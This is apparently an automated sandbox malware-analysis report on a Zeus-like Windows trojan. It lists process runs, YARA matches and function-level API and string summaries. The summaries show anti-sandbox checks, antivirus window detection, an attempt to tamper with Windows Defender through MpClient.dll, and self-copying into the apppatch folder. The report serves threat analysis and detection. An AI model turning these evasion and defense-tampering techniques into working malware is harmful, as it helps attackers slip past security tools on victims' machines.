Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	12:13:41
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 992
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:13:43
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.2632514116.0000000002EB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:13:43
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 696
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	12:13:43
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	12:13:44
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 740
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	12:13:45
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	12:13:46
Start date:	11/11/2024
Path:	C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe"
Imagebase:	0x5a0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	12:13:46
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1444
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	12:13:47
Start date:	11/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 724
Imagebase:	0xe20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	64.6%
Total number of Nodes:	246
Total number of Limit Nodes:	11

Executed Functions

Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35

Part of subcall function 00403900: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
Part of subcall function 00403900: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
Part of subcall function 00403900: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87

ExitProcess.KERNEL32 ref: 00402C46
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
GetTickCount.KERNEL32 ref: 00402C69
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
IsUserAnAdmin.SHELL32 ref: 00402C9B
ExitProcess.KERNEL32 ref: 00402CAC

Strings

explorer.exe, xrefs: 00402DC2, 00402DC7, 00402E24, 00402E29
user32.dll, xrefs: 00402C1C
kernel32.dll, xrefs: 00402CC5
IsWow64Process, xrefs: 00402CDD
____AVP.Root, xrefs: 00402C58
Pn7w, xrefs: 00402DB1, 00402E13
Fri Jun 17 05:52:09 20112, xrefs: 00402D86, 00402D96, 00402DE8, 00402DF8
winlogon.exe, xrefs: 00402DBB, 00402E1D
\apppatch\, xrefs: 00402D06, 00402D56

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 3353599405-700788231
Opcode ID: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
Opcode Fuzzy Hash: bc37064e32afb366b102f5e82575ccf3b4a8d8f59925a4562639c9f879143649
Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD

Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
RegCloseKey.ADVAPI32(?), ref: 00403973
RegCloseKey.ADVAPI32(?), ref: 0040397F
GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
CharUpperA.USER32(?), ref: 004039C6
strstr.MSVCRT ref: 004039DE
strstr.MSVCRT ref: 004039F7
strstr.MSVCRT ref: 00403A10
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403A9F
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3

Strings

HARDWARE\DESCRIPTION\System, xrefs: 00403915
M, xrefs: 00403997
VIRUSCLONE, xrefs: 00403A0A
Q, xrefs: 00403985
SystemBiosVersion, xrefs: 0040395B
SANDBOX, xrefs: 004039D8
E, xrefs: 0040398E
\cwsandbox\, xrefs: 00403AA5
U, xrefs: 004039A0
MALNETVM, xrefs: 004039F1
\sandbox\, xrefs: 00403AB7
\sand-box\, xrefs: 00403A93

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
API String ID: 1431998568-3499098167
Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8

Function 004020B0 Relevance: 36.8, APIs: 3, Strings: 18, Instructions: 81
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 004021F3
DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402223
CloseHandle.KERNEL32(00000000), ref: 0040222A

Strings

t, xrefs: 004021D4
S, xrefs: 00402195
T, xrefs: 004021AA
m, xrefs: 004021E2
", xrefs: 00402187
m, xrefs: 004021CD
t, xrefs: 004021E9
E, xrefs: 004021A3
d, xrefs: 00402153
g, xrefs: 00402179
4, xrefs: 004021B8
e, xrefs: 0040216B
s, xrefs: 00402172
", xrefs: 0040215A
D, xrefs: 004021B1
0, xrefs: 004021BF
\\.\KmxAgent, xrefs: 004020C8
E, xrefs: 0040219C

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55

Function 00401A30 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 103
memoryfilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004010A0: CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
Part of subcall function 004010A0: RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
Part of subcall function 004010A0: ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
Part of subcall function 004010A0: CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194

RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
GetTickCount.KERNEL32 ref: 00401A77
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
WriteFile.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AF9
SetEndOfFile.KERNELBASE(00000000), ref: 00401B04
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
CloseHandle.KERNELBASE(00000000), ref: 00401B2B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
HeapValidate.KERNEL32(00000000), ref: 00401B3D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
RtlFreeHeap.NTDLL(00000000), ref: 00401B4D

Strings

'+@, xrefs: 00401A36
ntdll.dll, xrefs: 00401A83
RtlUniform, xrefs: 00401A92

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocateCountHeaderImageModuleProcReadSizeTickmemset
String ID: '+@$RtlUniform$ntdll.dll
API String ID: 444222748-2605303930
Opcode ID: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
Instruction ID: 5333274c7b5ae32bd68dbaed39568bfcb3f6f97b50696231050ce748e7cb221e
Opcode Fuzzy Hash: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
Instruction Fuzzy Hash: 083181B1601304ABE710AB75DD49F5B3AACAB84755F458136FF05F72E0EB78D9008AA8

Function 004010A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
memset.MSVCRT ref: 00401114
ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194

Strings

'+@, xrefs: 004010C5

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
String ID: '+@
API String ID: 995291462-3270456718
Opcode ID: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
Instruction ID: 9704cbedb43cf1f0123ea2a6f6cc4f04c30b9336f8140f0f9319c9250b15b478
Opcode Fuzzy Hash: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
Instruction Fuzzy Hash: EF3176B2A01214ABD7109BA59D48F6B7B6CEB88B51F144236FF04F7290D7349D0186A8

Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401FFE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
SetCurrentDirectoryA.KERNELBASE(?), ref: 00402037
LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402046
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
FreeLibrary.KERNELBASE(00000000), ref: 0040208C

Strings

V,@, xrefs: 00402092
MpClient.dll, xrefs: 00402041
WDEnable, xrefs: 00402055
Windows Defender, xrefs: 0040201E

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$V,@$WDEnable$Windows Defender
API String ID: 1010965793-4204822615
Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8

Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228
commemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
SysAllocString.OLEAUT32(?), ref: 004025C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
SysFreeString.OLEAUT32(00402C95), ref: 0040273D
SysFreeString.OLEAUT32(00000000), ref: 00402744
CoUninitialize.COMBASE ref: 0040279E

Strings

Windows Explorer, xrefs: 004025CD

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94

Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
CloseHandle.KERNEL32(00000000), ref: 0040231D

Strings

\\.\pipe\acsipc_server, xrefs: 00402265

Memory Dump Source

Source File: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2127342577.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bpfz752pYZ.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 00402950 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,76D6DB30), ref: 0040298B
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
PathFileExistsA.KERNELBASE(?), ref: 004029C4
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
GetCurrentProcess.KERNEL32(?), ref: 00402A3E
GetTickCount.KERNEL32 ref: 00402A76

Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC

Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373

_snprintf.MSVCRT ref: 00402AF0
CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
HeapValidate.KERNEL32(00000000), ref: 00402B68
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
RtlFreeHeap.NTDLL(00000000), ref: 00402B77
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
GetCurrentProcess.KERNEL32(?), ref: 00402BC6
GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
ExitProcess.KERNEL32 ref: 00402BF5
GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00

Strings

kernel32.dll, xrefs: 00402A11, 00402B9C
svchost.exe, xrefs: 00402A5A
IsWow64Process, xrefs: 00402A27, 00402BAF
.dat, xrefs: 00402AC8
